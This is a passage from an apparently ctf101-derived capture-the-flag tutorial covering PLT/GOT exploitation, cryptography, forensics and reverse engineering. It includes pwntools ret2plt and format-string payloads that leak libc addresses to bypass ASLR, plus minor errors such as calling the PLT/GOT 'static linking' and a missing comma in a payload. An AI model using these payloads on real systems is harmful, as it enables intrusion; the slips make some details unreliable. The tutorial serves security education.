in memory. When the PLT gets called, it reads the GOT address and redirects execution there. If the address is empty, it coordinates with the ld.so
(also called the dynamic linker/loader) to get the function address and store it in the GOT.
How is this useful for binary exploitation?
Well, there are two key takeaways from the above explanation:
- Calling the PLT address of a function is equivalent to calling the function itself
- The GOT address contains addresses of functions in
libc
, and the GOT is within the binary.
The use of the first point is clear - if we have a PLT entry for a desirable libc
function, for example, system
, we can just redirect execution to its PLT entry and it will be the equivalent of calling the system
directly; no need to jump into libc
.
The second point is less obvious, but debatably even more important. As the GOT is part of the binary, it will always be a constant offset away from the base. Therefore, if PIE is disabled or you somehow leak the binary base, you know the exact address that contains a libc
function's address. If you perhaps have an arbitrary read, it's trivial to leak the real address of the libc
function and therefore bypass ASLR.
Exploiting an Arbitrary Read
There are two main ways that I (personally) exploit an arbitrary read. Note that these approaches will cause not only the GOT entry to be returned but everything else until a null byte is reached as well, due to strings in C being null-terminated; make sure you only take the required number of bytes.
ret2plt
A ret2plt is a common technique that involves calling puts@plt
and passing the GOT entry of puts as a parameter. This causes puts
to print out its own address in libc
. You then set the return address to the function you are exploiting in order to call it again and enable you to
# 32-bit ret2plt
payload = flat(
b'A' * padding,
elf.plt['puts'],
elf.symbols['main'],
elf.got['puts']
)
# 64-bit
payload = flat(
b'A' * padding,
POP_RDI,
elf.got['puts']
elf.plt['puts'],
elf.symbols['main']
)
flat()
packs all the values you give it withp32()
andp64()
(depending on context) and concatenates them, meaning you don't have to write the packing functions out all the time
%s format string
This has the same general theory but is useful when you have limited stack space or a ROP chain would alter the stack in such a way as to complicate future payloads, for example when stack pivoting.
payload = p32(elf.got['puts']) # p64() if 64-bit
payload += b'|'
payload += b'%3$s' # The third parameter points at the start of the buffer
# this part is only relevant if you need to call the function again
payload = payload.ljust(40, b'A') # 40 is the offset until you're overwriting the instruction pointer
payload += p32(elf.symbols['main'])
# Send it off...
p.recvuntil(b'|') # This is not required
puts_leak = u32(p.recv(4)) # 4 bytes because it's 32-bit
Summary
- The PLT and GOT do the bulk of static linking
- The PLT resolves actual locations in the
libc
of functions you use and stores them in the GOT- Next time that function is called, it jumps to the GOT and resumes execution there
- Calling
function@plt
is equivalent to calling the function itself - An arbitrary read enables you to read the GOT and thus bypass ASLR by calculating the
libc
base
Cryptography
https://ctf101.org/cryptography/overview/
Cryptography is the reason we can use banking apps, transmit sensitive information over the web, and in general protect our privacy. However, a large part of CTFs is breaking widely used encryption schemes that are improperly implemented. The math may seem daunting, but more often than not, a simple understanding of the underlying principles will allow you to find flaws and crack the code.
The word “cryptography” technically means the art of writing codes. When it comes to digital forensics, it’s a method you can use to understand how data is constructed for your analysis.
What is cryptography used for?
Uses in everyday software
- Securing web traffic (passwords, communication, etc.)
- Securing copyrighted software code
Malicious uses
- Hiding malicious communication
- Hiding malicious code
Topics
- XOR
- Cesear Cipher
- Substitution Cipher
- Vigenere Cipher
- Hashing Functions
- Block Ciphers
- Stream Ciphers
- RSA
XOR
Data Representation
Data can be represented in different bases, an 'A' needs to be a numerical representation of Base 2 or binary so computers can understand them
XOR Basics
An XOR or eXclusive OR is a bitwise operation indicated by ^
and shown by the following truth table:
A | B | A ^ B |
---|---|---|
0 | 0 | 0 |
0 | 1 | 1 |
1 | 0 | 1 |
1 | 1 | 0 |
So what XOR'ing bytes in the action 0xA0 ^ 0x2C
translates to is:
1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 |
---|---|---|---|---|---|---|---|
0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 |
1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 |
---|
0b10001100` is equivalent to `0x8C`, a cool property of XOR is that it is reversible meaning `0x8C ^ 0x2C = 0xA0` and `0x8C ^ 0xA0 = 0x2C
What does this have to do with CTF?
XOR is a cheap way to encrypt data with a password. Any data can be encrypted using XOR as shown in this Python example:
>>> data = 'CAPTURETHEFLAG'
>>> key = 'A'
>>> encrypted = ''.join([chr(ord(x) ^ ord(key)) for x in data])
>>> encrypted
'\x02\x00\x11\x15\x14\x13\x04\x15\t\x04\x07\r\x00\x06'
>>> decrypted = ''.join([chr(ord(x) ^ ord(key)) for x in encrypted])
>>> decrypted
'CAPTURETHEFLAG'
This can be extended using a multibyte key by iterating in parallel with the data.
Exploiting XOR Encryption
Single Byte XOR Encryption
Single Byte XOR Encryption is trivial to bruteforce as there are only 255 key combinations to try.
Multibyte XOR Encryption
Multibyte XOR gets exponentially harder the longer the key, but if the encrypted text is long enough, character frequency analysis is a viable method to find the key. Character Frequency Analysis means that we split the cipher text into groups based on the number of characters in the key. These groups then are bruteforced using the idea that some letters appear more frequently in the English alphabet than others.
Substitution Cipher
A Substitution Cipher is a system of encryption where different symbols substitute a normal alphabet.
Caesar Cipher/ROT 13
The Caesar Cipher or Caesar Shift is a cipher that uses the alphabet to encode texts.
CAESAR` encoded with a shift of 8 is `KIMAIZ` so `ABCDEFGHIJKLMNOPQRSTUVWXYZ` becomes `IJKLMNOPQRSTUVWXYZABCDEFGH
ROT13 is the same thing but a fixed shift of 13, this is a trivial cipher to bruteforce because there are only 25 shifts.
Vigenere Cipher
A Vigenere Cipher is an extended Caesar Cipher where a message is encrypted using various Caesar-shifted alphabets.
The following table can be used to encode a message:
Encryption
For example, encrypting the text SUPERSECRET
with CODE
would follow this process:
CODE
gets padded to the length ofSUPERSECRET
so the key becomesCODECODECOD
- For each letter in
SUPERSECRET
we use the table to get the Alphabet to use, in this instance rowC
and columnS
- The ciphertext's first letter then becomes
U
- We eventually get
UISITGHGTSW
Decryption
- Go to the row of the key, in this case,
C
- Find the letter of the cipher text in this row, in this case
U
- The column is the first letter of the decrypted ciphertext, so we get
S
- After repeating this process we get back to
SUPERSECRET
Hashing Functions
Hashing functions are one-way functions that theoretically provide a unique output for every input. MD5, SHA-1, and other hashes which were considered secure are now found to have collisions or two different pieces of data which produce the same supposed unique output.
String Hashing
A string hash is a number or string generated using an algorithm that runs on text or data.
The idea is that each hash should be unique to the text or data (although sometimes it isn’t). For example, the hash for “dog” should be different from other hashes.
You can use command line tools or online resources such as this one. Example: $ echo -n password | md5 5f4dcc3b5aa765d61d8327deb882cf99
Here, “password” is hashed with different hashing algorithms:
- SHA-1: 5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8
- SHA-2: 5E884898DA28047151D0E56F8DC6292773603D0D6AABBDD62A11EF721D1542D8
- MD5: 5F4DCC3B5AA765D61D8327DEB882CF99
- CRC32: BBEDA74F
Generally, when verifying a hash visually, you can simply look at the first and last four characters of the string.
File Hashing
A file hash is a number or string generated using an algorithm that is run on text or data. The premise is that it should be unique to the text or data. If the file or text changes in any way, the hash will change.
What is it used for? - File and data identification - Password/certificate storage comparison
How can we determine the hash of a file? You can use the md5sum command (or similar).
$ md5sum samplefile.txt
3b85ec9ab2984b91070128be6aae25eb samplefile.txt
Hash Collisions
A collision is when two pieces of data or text have the same cryptographic hash. This is very rare.
What’s significant about collisions is that they can be used to crack password hashes. Passwords are usually stored as hashes on a computer since it’s hard to get the passwords from hashes.
If you bruteforce by trying every possible piece of text or data, eventually you’ll find something with the same hash. Enter it, and the computer accepts it as if you entered the actual password.
Two different files on the same hard drive with the same cryptographic hash can be very interesting.
“It’s now well-known that the cryptographic hash function MD5 has been broken,” said Peter Selinger of Dalhousie University. “In March 2005, Xiaoyun Wang and Hongbo Yu of Shandong University in China published an article in which they described an algorithm that can find two different sequences of 128 bytes with the same MD5 hash.”
For example, he cited this famous pair:
and
Each of these blocks has MD5 hash 79054025255fb1a26e4bc422aef54eb4.
Selinger said that “the algorithm of Wang and Yu can be used to create files of arbitrary length that have identical MD5 hashes, and that differ only in 128 bytes somewhere in the middle of the file. Several people have used this technique to create pairs of interesting files with identical MD5 hashes.”
Ben Laurie has a nice website that visualizes this MD5 collision. For a non-technical, though slightly outdated, introduction to hash functions, see Steve Friedl’s Illustrated Guide. And here’s a good article from DFI News that explores the same topic.
Block Ciphers
A Block Cipher is an algorithm that is used in conjunction with a cryptosystem to package a message into evenly distributed 'blocks' which are encrypted one at a time.
Definitions
- Mode of Operation: How a block cipher is applied to an amount of data that exceeds a block's size
- Initialization Vector (IV): A sequence of bytes that is used to randomize encryption even if the same plaintext is encrypted
- Starting Variable (SV): Similar to the IV, except it is used during the first block to provide a random seed during encryption
- Padding: Padding is used to ensure that the block sizes all line up and ensure the last block fits the block cipher
- Plaintext: Unencrypted text; Data without obfuscation
- Key: A secret used to encrypt plaintext
- Ciphertext: Plaintext encrypted with a key
Common Block Ciphers
Mode | Formulas | Ciphertext |
---|---|---|
ECB | Yi = F(PlainTexti, Key) | Yi |
CBC | Yi = PlainTexti XOR Ciphertexti-1 | F(Y, key); Ciphertext0 = IV |
PCBC | Yi = PlainTexti XOR (Ciphertexti-1 XOR PlainTexti-1) | F(Y, key); Ciphertext0 = IV |
CFB | Yi = Ciphertexti-1 | Plaintext XOR F(Y, key); Ciphertext0 = IV |
OFB | Yi = F(Key, Ii-1);Y0=IV | Plaintext XOR Yi |
CTR | Yi = F(Key, IV + g(i));IV = token(); | Plaintext XOR Yi |
Note
In this case, i
represents an index over the # of blocks in the plaintext. F() and g() represent the function used to convert plaintext into ciphertext.
Electronic Codebook (ECB)
ECB is the most basic block cipher, it simply chunks up plaintext into blocks and independently encrypts those blocks, and chains them all into a ciphertext.
Flaws
Because ECB independently encrypts the blocks, patterns in data can still be seen clearly, as shown in the CBC Penguin image below.
Original Image | ECB Image | Other Block Cipher Modes |
---|---|---|
Cipher Block Chaining (CBC)
CBC is an improvement upon ECB where an Initialization Vector is used to add randomness. The encrypted previous block is used as the IV for each sequential block meaning that the encryption process cannot be parallelized. CBC has been declining in popularity due to a variety of
Note
Even though the encryption process cannot be parallelized, the decryption process can be parallelized. If the wrong IV is used for decryption it will only affect the first block as the decryption of all other blocks depends on the ciphertext not the plaintext.
Propagating Cipher Block Chaining (PCBC)
PCBC is a less-used cipher that modifies CBC so that decryption is also not parallelizable. It also cannot be decrypted from any point as changes made during the decryption and encryption process "propagate" throughout the blocks, meaning that both the plaintext and ciphertext are used when encrypting or decrypting as seen in the images below.
Counter (CTR)
Note
The counter is also known as CM, integer counter mode (ICM), and segmented integer counter (SIC)
CTR mode makes the block cipher similar to a stream cipher and it functions by adding a counter with each block in combination with a nonce and key to XOR the plaintext to produce the ciphertext. Similarly, the decryption process is the same except instead of XORing the plaintext, the ciphertext is XORed. This means that the process is parallelizable for both encryption and decryption and you can begin from anywhere as the counter for any block can be deduced easily.
Security Considerations
If the nonce chosen is non-random, it is important to concatenate the nonce with the counter (high 64 bits to the nonce, low 64 bits to the counter) as adding or XORing the nonce with the counter would break security as an attacker can cause a collision with the nonce and counter. An attacker with access to providing a plaintext, nonce, and counter can then decrypt a block by using the ciphertext as seen in the decryption image.
Padding Oracle Attack
A Padding Oracle Attack sounds complex but essentially means abusing a block cipher by changing the length of input and being able to determine the plaintext.
Requirements
- An oracle, or program, which encrypts data using CBC
- Continual use of the same key
Execution
- If we have two blocks of ciphertext, C1, and C2, we can get the plaintext P2
- Since we know that CBC decryption is dependent on the prior ciphertext if we change the last byte of C1 we can see if C2 has the correct padding
- If it is correctly padded we know that the last byte of the plaintext
- If not, we can increase our byte by one and repeat until we have a successful padding
- We then repeat this for all successive bytes following C1 and if the block is 16 bytes we can expect a maximum of 4080 attempts which is trivial
Stream Ciphers
A Stream Cipher is used for symmetric key cryptography, or when the same key is used to encrypt and decrypt data. Stream Ciphers encrypt pseudorandom sequences with bits of plaintext to generate ciphertext, usually with XOR. A good way to think about Stream Ciphers is to think of them as generating one-time pads from a given state.
Definitions
- A keystream is a sequence of pseudorandom digits that extend to the length of the plaintext to uniquely encrypt each character based on the corresponding digit in the keystream
One-Time Pads
A one-time pad is an encryption mechanism whereby the entire plaintext is XOR'd with a random sequence of numbers to generate a random ciphertext. The advantage of the one-time pad is that it offers an immense amount of security BUT for it to be useful, the randomly generated key must be distributed on a separate secure channel, meaning that one-time pads have little use in modern-day cryptographic applications on the internet. Stream ciphers extend upon this idea by using a key, usually 128-bit in length, to seed a pseudorandom keystream which is used to encrypt the text.
Types of Stream Ciphers
Synchronous Stream Ciphers
A Synchronous Stream Cipher generates a keystream based on internal states not related to the plaintext or ciphertext. This means that the stream is generated pseudorandomly outside of the context of what is being encrypted. A binary additive stream cipher is the term used for a stream cipher in which XOR's the bits with the bits of the plaintext. Encryption and decryption require that the synchronous state cipher is in the same state, otherwise, the message cannot be decrypted.
Self-synchronizing Stream Ciphers
A Self-synchronizing Stream Cipher, also known as an asynchronous stream cipher or ciphertext autokey (CTAK), is a stream cipher that uses the previous N digits to compute the keystream used for the next N characters.
Note
Seems a lot like block ciphers doesn't it? That's because block cipher feedback mode (CFB) is an example of a self-synchronizing stream cipher.
Stream Cipher Vulnerabilities
Key Reuse
The key tenet of using stream ciphers securely is to NEVER repeat key use because of the commutative property of XOR. If C1 and C2 have been XOR'd with a key K, retrieving that key K is trivial because C1 XOR C2 = P1 XOR P2, and having an English language-based XOR means that cryptoanalysis tools such as a character frequency analysis will work well due to the low entropy of the English language.
Bit-flipping Attack
Another key tenet of using stream ciphers securely is considering that just because a message has been decrypted, it does not mean the message has not been tampered with. Because decryption is based on state, if an attacker knows the layout of the plaintext, a Man in the Middle (MITM) attack can flip a bit during transit altering the underlying ciphertext. If a ciphertext decrypts to 'Transfer $1000', then a middleman can flip a single bit for the ciphertext to decrypt to 'Transfer $9000' because changing a single character in the ciphertext does not affect the state in a synchronous stream cipher.
RSA
RSA, which is an abbreviation of the author's name (Rivest–Shamir–Adleman), is a cryptosystem that allows for asymmetric encryption. Asymmetric cryptosystems are also commonly referred to as Public Key Cryptography where a public key is used to encrypt data and only a secret, a private key can be used to decrypt the data.
Definitions
- The Public Key is made up of (n, e)
- The Private Key is made up of (n, d)
- The message is represented as m and is converted into a number
- The encrypted message or ciphertext is represented by c
- p and q are prime numbers which make up n
- e is the public exponent
- n is the modulus and its length in bits is the bit length (i.e. 1024 bit RSA)
- d is the private exponent
- The totient λ(n) is used to compute d and is equal to the lcm(p-1, q-1), another definition for λ(n) is that λ(pq) = lcm(λ(p), λ(q))
What makes RSA viable?
If public n, public e, private d are all very large numbers and a message m holds true for 0 < m < n, then we can say:
(m^e)d ≡ m (mod n)
Note
The triple equals sign in this case refers to modular congruence which in this case means that there exists an integer k such that (m^e)d = kn + m
RSA is viable because it is incredibly hard to find d even with m, n, and e because factoring large numbers is an arduous process.
Implementation
RSA follows 4 steps to be implemented: 1. Key Generation 2. Encryption 3. Decryption
Key Generation
We are going to follow Wikipedia's small numbers example to make this idea a bit easier to understand.
Note
In This example, we are using Carmichael's totient function where λ(n) = lcm(λ(p), λ(q)), but Euler's totient function is perfectly valid to use with RSA. Euler's totient is φ(n) = (p − 1)(q − 1)
- Choose two prime numbers such as:
- p = 61 and q = 53
- Find n:
- n = pq = 3233
- Calculate λ(n) = lcm(p-1, q-1)
- λ(3233) = lcm(60, 52) = 780
- Choose a public exponent such that 1 < e < λ(n) and is coprime (not a factor of) λ(n). The standard in most cases is 65537, but we will be using:
- e = 17
- Calculate d as the modular multiplicative inverse or in English find d such that:
de mod λ(n) = 1
- d * 17 mod 780 = 1
- d = 413
Now we have a public key of (3233, 17) and a private key of (3233, 413)
Encryption
With the public key, m can be encrypted trivially
The ciphertext is equal to m**e mod n or:
c = m^17 mod 3233
Decryption
With the private key, m can be decrypted trivially as well
The plaintext is equal to c**d mod n or:
m = c^413 mod 3233
Exploitation
From the RsaCtfTool README
Attacks:
- Weak public key factorization
- Wiener's attack
- Hastad's attack (Small public exponent attack)
- Small q (q < 100,000)
- Common factor between ciphertext and modulus attack
- Fermat's factorization for close p and q
- Gimmicky Primes method
- Past CTF Primes method
- Self-Initializing Quadratic Sieve (SIQS) using Yafu
- Common factor attacks across multiple keys
- Small fractions method when p/q is close to a small fraction
- Boneh Durfee Method when the private exponent d is too small compared to the modulus (i.e d < n^0.292)
- Elliptic Curve Method
- Pollards p-1 for relatively smooth numbers
- Mersenne primes factorization
Forensics
https://ctf101.org/forensics
Forensics is the art of recovering the digital trail left on a computer. There are plenty of methods to find data that is seemingly deleted, not stored, or worse, covertly recorded.
An important part of Forensics is having the right tools, as well as being familiar with the following topics:
- File Formats
- EXIF data
- Wireshark & PCAPs
- What is Wireshark
- Steganography
- Disk Imaging
File Formats
File Extensions are not the sole way to identify the type of a file, files have certain leading bytes called file signatures which allow programs to parse the data consistently. Files can also contain additional "hidden" data called metadata which can be useful in finding out information about the context of a file's data.
File Signatures
File signatures (also known as File Magic Numbers) are bytes within a file used to identify the format of the file. Generally, they’re 2-4 bytes long, found at the beginning of a file.
What is it used for?
Files can sometimes come without an extension, or with incorrect ones. We use file signature analysis to identify the format (file type) of the file. Programs need to know the file type to open properly.
How do you find the file signature?
You need to be able to look at the binary data that constitutes the file you’re examining. To do this, you’ll use a hexadecimal editor. Once you find the file signature, you can check it against file signature repositories such as Gary Kessler’s.
Example
The file above, when opened in a Hex Editor, begins with the bytes FFD8FFE0 00104A46 494600
or in ASCII ˇÿˇ‡ JFIF
where \x00
and \x10
lack symbols.
Searching in Gary Kessler’s database shows that this file signature belongs to a JPEG/JFIF graphics file
, exactly what we suspect.
Metadata
Metadata is data about data. Different types of files have different metadata. The metadata on a photo could include dates, camera information, GPS location, comments, etc. For music, it could include the title, author, track number, and album.
What kind of file metadata is useful?
Potentially, any file metadata you can find could be useful.
How do I find it?
EXIF Data is metadata attached to photos which can include location, time, and device information.
One of our favorite tools is ExifTool, which displays metadata for an input file, including: - File size - Dimensions (width and height) - File type - Programs used to create (e.g. Photoshop) - OS used to create (e.g. Apple)
Run command line: exiftool(-k).exe [filename]
and you should see something like this:
Example
Let's take a look at File A's metadata with ExifTool:
File type
Image description
Make and camera info
GPS Latitude/Longitude
Timestamps
Timestamps are data that indicate the time of certain events (MAC): - Modification – when a file was modified - Access – when a file or entries were read or accessed - Creation – when files or entries were created
Types of timestamps
- Modified
- Accessed
- Created
- Date Changed (MFT)
- Filename Date Created (MFT)
- Filename Date Modified (MFT)
- Filename Date Accessed (MFT)
- INDX Entry Date Created
- INDX Entry Date Modified
- INDX Entry Date Accessed
- INDX Entry Date Changed
Why do we care?
Certain events such as creating, moving, copying, opening, editing, etc. might affect the MAC times. If the MAC timestamps can be attained, a timeline of events could be created.
Timeline Patterns
There are plenty more patterns than the ones introduced below, but these are the basics you should start with to get a good understanding of how it works, and to complete this challenge.
Examples
We know that the BMP files fileA and fileD are the same, but that the JPEG files fileB and fileC are different somehow. So how can we find out what went on with these files?
By using time stamp information from the file system, we can learn that the BMP fileD was the original file, with fileA being a copy of the original. Afterward, fileB was created by modifying fileB, and fileC was created by modifying fileA differently.
Follow along as we demonstrate.
We’ll start by analyzing images in AccessData FTK Imager, where there’s a Properties window that shows you some information about the file or folder you’ve selected.
Here are the extracted MAC times for fileA, fileB, fileC, and fileD: Note, AccessData FTK Imager assumes that the file times on the drive are in UTC (Universal Coordinated Time). I subtracted four hours since the USB was set up in Eastern Standard Time. This isn’t necessary, but it helps me understand the times a bit better.
Highlight timestamps that are the same, if timestamps are off by a few seconds, they should be counted as the same. This lets you see a clear difference between different timestamps. Then, highlight oldest to newest to help put them in order.
Identify timestamp patterns.
Wireshark
Wireshark is a network protocol analyzer that is often used in CTF challenges to look at recorded network traffic. Wireshark uses a file type called PCAP to record traffic. PCAPs are often distributed in CTF challenges to provide recorded traffic history.
Interface
Upon opening Wireshark, you are greeted with the option to open a PCAP or begin capturing network traffic on your device.
The network traffic displayed initially shows the packets in the order in which they were captured. You can filter packets by protocol, source IP address, destination IP address, length, etc.
To apply filters, simply enter the constraining factor, for example, 'http', in the display filter bar.
Filters can be chained together using the '&&' notation. To filter by IP, ensure a double equals '==' is used.
The most pertinent part of a packet is its data payload and protocol information.
Decrypting SSL Traffic
By default, Wireshark cannot decrypt SSL traffic on your device unless you grant it specific certificates.
High-Level SSL Handshake Overview
For a network session to be encrypted properly, the client and server must share a common secret that they can use to encrypt and decrypt data without someone in the middle being able to guess. The SSL Handshake loosely follows this format:
- The client sends a list of available cipher suites it can use along with a random set of bytes referred to as client_random
- The server sends back the cipher suite that will be used, such as TLS_DHE_RSA_WITH_AES_128_CBC_SHA, along with a random set of bytes referred to as server_random
- The client generates a pre-master secret, encrypts it, then sends it to the server.
- The server and client then generate a common master secret using the selected cipher suite
- The client and server begin communicating using this common secret
Decryption Requirements
There are several ways to be able to decrypt traffic.
- If you have the client and server random values and the pre-master secret, the master secret can be generated and used to decrypt the traffic
- If you have the master secret, traffic can be decrypted easily
- If the cipher-suite uses RSA, you can factor n in the key to break the encryption on the encrypted pre-master secret and generate the master secret with the client and server randoms
Steganography
Steganography is the practice of hiding data in plain sight. Steganography is often embedded in images or audio.
You could send a picture of a cat to a friend and hide text inside. Looking at the image, there’s nothing to make anyone think there’s a message hidden inside it.
You could also hide a second image inside the first.
Steganography Detection
So we can hide text and an image, how do we find out if there is hidden data?
FileA and FileD appear the same, but they’re different. Also, FileD was modified after it was copied, so it’s possible there might be steganography in it.
FileB and FileC don’t appear to have been modified after being created. That doesn’t rule out the possibility that there’s steganography in them, but you’re more likely to find it in fileD. This brings up two questions:
- Can we determine that there is steganography in fileD?
- If there is, what was hidden in it?
LSB Steganography
Files are made of bytes. Each byte is composed of eight bits.
Changing the least-significant bit (LSB) doesn’t change the value very much.
So we can modify the LSB without changing the file noticeably. By doing so, we can hide a message inside.
LSB Steganography in Images
LSB Stegonagraphy or Least Significant Bit Stegonagraphy is a method of steganography where data is recorded in the lowest bit of a byte.
Say an image has a pixel with an RGB value of (255, 255, 255), the bits of those RGB values will look like
1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 |
---|
By modifying the lowest, or least significant, bit, we can use the 1-bit space across every RGB value for every pixel to construct a message.
1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 |
---|
The reason steganography is hard to detect by sight is that a 1-bit difference in color is insignificant as seen below.
Example
Let’s say we have an image, and part of it contains the following binary:
And let’s say we want to hide the character y inside.
First, we need to convert the hidden message to binary.
Now we take each bit from the hidden message and replace the LSB of the corresponding byte with it.
And again:
And again:
And again:
And again:
And again:
And again:
And once more:
Decoding LSB steganography is exactly the same as encoding, but in reverse. For each byte, grab the LSB and add it to your decoded message. Once you’ve gone through each byte, convert all the LSBs you grabbed into text or a file. (You can use your file signature knowledge here!)
What other types of steganography are there?
Steganography is hard for the defense side because there’s practically an infinite number of ways it could be carried out. Here are a few examples: - LSB steganography: different bits, different bit combinations - Encode in every certain number of bytes - Use a password - Hide in different places - Use encryption on top of steganography.
Disk Imaging
A forensic image is an electronic copy of a drive (e.g. a hard drive, USB, etc.). It’s a bit-by-bit or bitstream file that’s an exact, unaltered copy of the media being duplicated.
Wikipedia said that the most straightforward disk imaging method is to read a disk from start to finish and write the data to a forensics image format. “This can be a time-consuming process, especially for disks with a large capacity,” Wikipedia said.
To prevent write access to the disk, you can use a write blocker. It’s also common to calculate a cryptographic hash of the entire disk when imaging it. “Commonly-used cryptographic hashes are MD5, SHA1, and/or SHA256,” said Wikipedia. “By recalculating the integrity hash at a later time, one can determine if the data in the disk image has been changed. This by itself does not protect against intentional tampering, but it can indicate that the data was altered, e.g. due to corruption.”
Why image a disk? Forensic imaging: - Prevents tampering with the original data evidence - Allows you to play around with the copy, without worrying about messing up the original
Forensic Image Extraction Example
This example uses the tool AccessData FTK Imager.
Step 1: Go to File > Create Disk Image
Step 2: Select Physical Drive
, because the USB or hard drive you’re imaging is a physical device or drive.
Step 3: Select the drive you’re imaging. The 1000 GB is my computer hard drive; the 128 MB is the USB that I want to image.
Step 4: Add a new image destination
Step 5: Select whichever image type you want. Choose Raw (dd)
if you’re a beginner, since it’s the most common type
Step 6: Fill in all the evidence information
Step 7: Choose where you want to store it
Step 8: The image destination has been added. Now you can start the image extraction
Step 9: Wait for the image to be extracted
Step 10: This is the completed extraction
Step 11: Add the image you just created so that you can view it
Step 12: This time, choose the image file, since that’s what you just created
Step 13: Enter the path of the image you just created
Step 14: View the image.
- Evidence tree Structure of the drive image
- File list List of all the files in the drive image folder
- Properties Properties of the file/folder being examined
- Hex viewer View of the drive/folders/files in hexadecimal
Step 15: To view files in the USB, go to Partition 1 > [USB name] > [root]
in the Evidence Tree and look in the File List
Step 16: Selecting fileA, fileB, fileC, or fileD gives us some properties of the files & a preview of each photo
Step 17: Extract files of interest for further analysis by selecting, right-clicking, and choosing Export Files
Memory Forensics
There are plenty of traces of someone's activity on a computer, but perhaps some of the most valuable information can be found within memory dumps, that is images taken of RAM. These dumps of data are often very large but can be analyzed using a tool called Volatility
Volatility Basics
Memory forensics isn't all that complicated, the hardest part would be using your toolset correctly. A good workflow is as follows:
- Run
strings
for clues - Identify the image profile (which OS, version, etc.)
- Dump processes and look for suspicious processes
- Dump data related interesting processes
- View data in a format relating to the process (Word: docx, Notepad: txt, Photoshop: psd, etc.)
Profile Identification
To properly use Volatility you must supply a profile with --profile=PROFILE
, therefore before any sleuthing, you need to determine the profile using imageinfo:
$ python vol.py -f ~/image.raw imageinfo
Volatility Foundation Volatility Framework 2.4
Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP0x64, Win7SP1x64, Win2008R2SP0x64, Win2008R2SP1x64
AS Layer1 : AMD64PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/Users/Michael/Desktop/win7_trial_64bit.raw)
PAE type : PAE
DTB : 0x187000L
KDBG : 0xf80002803070
Number of Processors : 1
Image Type (Service Pack) : 0
KPCR for CPU 0 : 0xfffff80002804d00L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2012-02-22 11:29:02 UTC+0000
Image local date and time : 2012-02-22 03:29:02 -0800
Dump Processes
To view processes, the pslist
or pstree
, or psscan
command can be used.
$ python vol.py -f ~/image.raw pslist --profile=Win7SP0x64 pstree
Volatility Foundation Volatility Framework 2.5
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xffffa0ee12532180 System 4 0 108 0 ------ 0 2018-04-22 20:02:33 UTC+0000
0xffffa0ee1389d040 smss.exe 232 4 3 0 ------ 0 2018-04-22 20:02:33 UTC+0000
...
0xffffa0ee128c6780 VBoxTray.exe 3324 1123 10 0 1 0 2018-04-22 20:02:55 UTC+0000
0xffffa0ee14108780 OneDrive.exe 1422 1123 10 0 1 1 2018-04-22 20:02:55 UTC+0000
0xffffa0ee14ade080 svchost.exe 228 121 1 0 1 0 2018-04-22 20:14:43 UTC+0000
0xffffa0ee1122b080 notepad.exe 2019 1123 1 0 1 0 2018-04-22 20:14:49 UTC+0000
Process Memory Dump
Dumping the memory of a process can prove to be fruitful, say we want to dump the data from notepad.exe:
$ python vol.py -f ~/image.raw --profile=Win7SP0x64 memdump -p 2019 -D dump/
Volatility Foundation Volatility Framework 2.4
************************************************************************
Writing System [ 2019] to 2019.dmp
$ ls -alh dump/2019.dmp
-rw-r--r-- 1 user staff 111M Apr 22 20:47 dump/2019.dmp
Other Useful Commands
There are plenty of commands that Volatility offers but some highlights include:
$ python vol.py -f IMAGE --profile=PROFILE connections
: view network connections$ python vol.py -f IMAGE --profile=PROFILE cmdscan
: view commands that were run in cmd prompt
Hex Editor
A hexadecimal (hex) editor (also called a binary file editor or byte editor) is a computer program you can use to manipulate the fundamental binary data that constitutes a computer file. The name “hex” comes from “hexadecimal,” a standard numerical format for representing binary data. A typical computer file occupies multiple areas on the platter(s) of a disk drive, whose contents are combined to form the file. Hex editors that are designed to parse and edit sector data from the physical segments of floppy or hard disks are sometimes called sector editors or disk editors. A hex editor is used to see or edit the raw, exact contents of a file. Hex editors may be used to correct data corrupted by a system or application. A list of editors can be found on the forensics Wiki. You can download one and install it on your system.
Example
Open fileA.jpg in a hex editor. (Most Hex editors have either a “File > Open” option or a simple drag and drop.)
When you open fileA.jpg in your hex editor, you should see something similar to this:
Your hex editor should also have a “go to” or “find” feature so you can jump to a specific byte.
Reverse Engineering
https://ctf101.org/reverse-engineering/overview/
Reverse Engineering in a CTF is typically the process of taking a compiled (machine code, bytecode) program and converting it back into a more human-readable format.
Very often the goal of a reverse engineering challenge is to understand the functionality of a given program such that you can identify deeper issues.
- Assembly / Machine Code
- The C Programming Language
- Disassemblers
- Decompilers
Assembly/Machine Code
Machine Code or Assembly is code that has been formatted for direct execution by a CPU. Machine Code is why readable programming languages like C, when compiled, cannot be reversed into source code (well Decompilers can sort of, but more on that later).
From Source to Compilation
Godbolt shows the differences in machine code generated by various compilers.
For example, if we have a simple C++ function:
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
int main() {
char c;
int fd = syscall(2, "/etc/passwd", 0);
while (syscall(0, fd, &c, 1)) {
putchar(c);
}
}
We can see the compilation results in some verbose instructions for the CPU:
.LC0:
.string "/etc/passwd"
main:
push rbp
mov rbp, rsp
sub rsp, 16
mov edx, 0
mov esi, OFFSET FLAT:.LC0
mov edi, 2
mov eax, 0
call syscall
mov DWORD PTR [rbp-4], eax
.L3:
lea rdx, [rbp-5]
mov eax, DWORD PTR [rbp-4]
mov ecx, 1
mov esi, eax
mov edi, 0
mov eax, 0
call syscall
test rax, rax
setne al
test al, al
je .L2
movzx eax, BYTE PTR [rbp-5]
movsx eax, al
mov edi, eax
call putchar
jmp .L3
.L2:
mov eax, 0
leave
ret
This is a one-way process for compiled languages as there is no way to generate sources from machine code. While the machine code may seem unintelligible, the extremely basic functions can be interpreted with some practice.
x86-64
